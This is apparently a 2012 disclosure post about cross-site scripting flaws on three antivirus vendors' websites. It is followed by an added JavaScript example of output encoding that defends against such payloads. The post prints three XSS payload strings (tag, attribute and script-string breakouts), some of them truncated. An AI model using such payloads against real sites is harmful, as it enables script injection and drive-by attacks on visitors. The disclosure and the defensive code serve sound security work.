F-Secure, McAfee and Symantec websites again XSSed

Written by DP

Friday, 13 January 2012

Once again, the websites of the three famous antivirus vendors are vulnerable to cross-site scripting. The vulnerabilities were reported by "Zeitjak" and "dick" back in mid-April 2011 and still appear to work. They can be triggered in the latest Firefox, but not in the latest Internet Explorer and Google Chrome, whose built-in XSS protection is enabled by default.

Malicious people can exploit the vulnerabilities to perform drive-by-download attacks against visitors and faithful customers.

("><body+onload="document%2Ewrite(Strin
,111,62,60,47,115,99,114,105,112,116,62))"+

("
onfocus="document.write(String.fromCharCode(60)%2B'iframe src= height=100%25
/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar

(";document.location="";//

One thing is sure... when such vulns go public, usually all three vendors do their best to correct them quickly.
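
Because Firefox has no built-in filter, the correction has to happen on the server: encode each reflected parameter for the context it lands in. The following is an added example, not code from this article or from any of the vendors; the function names, page templates and sample inputs are constructed, with the inputs shaped like the three test strings above (tag breakout, attribute breakout, JavaScript string breakout).

```javascript
// Added example: context-specific output encoding for a reflected parameter.
// All names, templates and sample inputs are constructed for illustration.

// HTML attribute context: every non-alphanumeric character becomes a numeric
// entity, so a quote or angle bracket can never close the attribute or a tag.
function encodeForHtmlAttr(value) {
  return Array.from(String(value), (ch) =>
    /[A-Za-z0-9]/.test(ch) ? ch : `&#x${ch.codePointAt(0).toString(16)};`
  ).join("");
}

// JavaScript string-literal context: every non-alphanumeric UTF-16 unit becomes
// \uXXXX, so quotes, semicolons, slashes and "<" stay inside the literal.
function encodeForJsString(value) {
  const s = String(value);
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += /[A-Za-z0-9]/.test(s[i])
      ? s[i]
      : "\\u" + s.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

// Hypothetical templates that echo a search term back to the visitor.
function renderSearchBox(query) {
  return `<input type="text" name="q" value="${encodeForHtmlAttr(query)}">`;
}

function renderInlineScript(query) {
  return `<script>var lastQuery = "${encodeForJsString(query)}";</script>`;
}

// Constructed inputs with the same shape as the article's test strings.
const samples = {
  tagBreakout: '"><body onload="x">',
  attrBreakout: '" onfocus="x" foo="bar',
  jsBreakout: '";document.location="";//',
};

for (const [name, input] of Object.entries(samples)) {
  console.log(name, "->", renderSearchBox(input));
  console.log(name, "->", renderInlineScript(input));
}
```

The two encoders are not interchangeable: HTML entities are not decoded inside a script block, and \u escapes mean nothing inside an attribute value.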
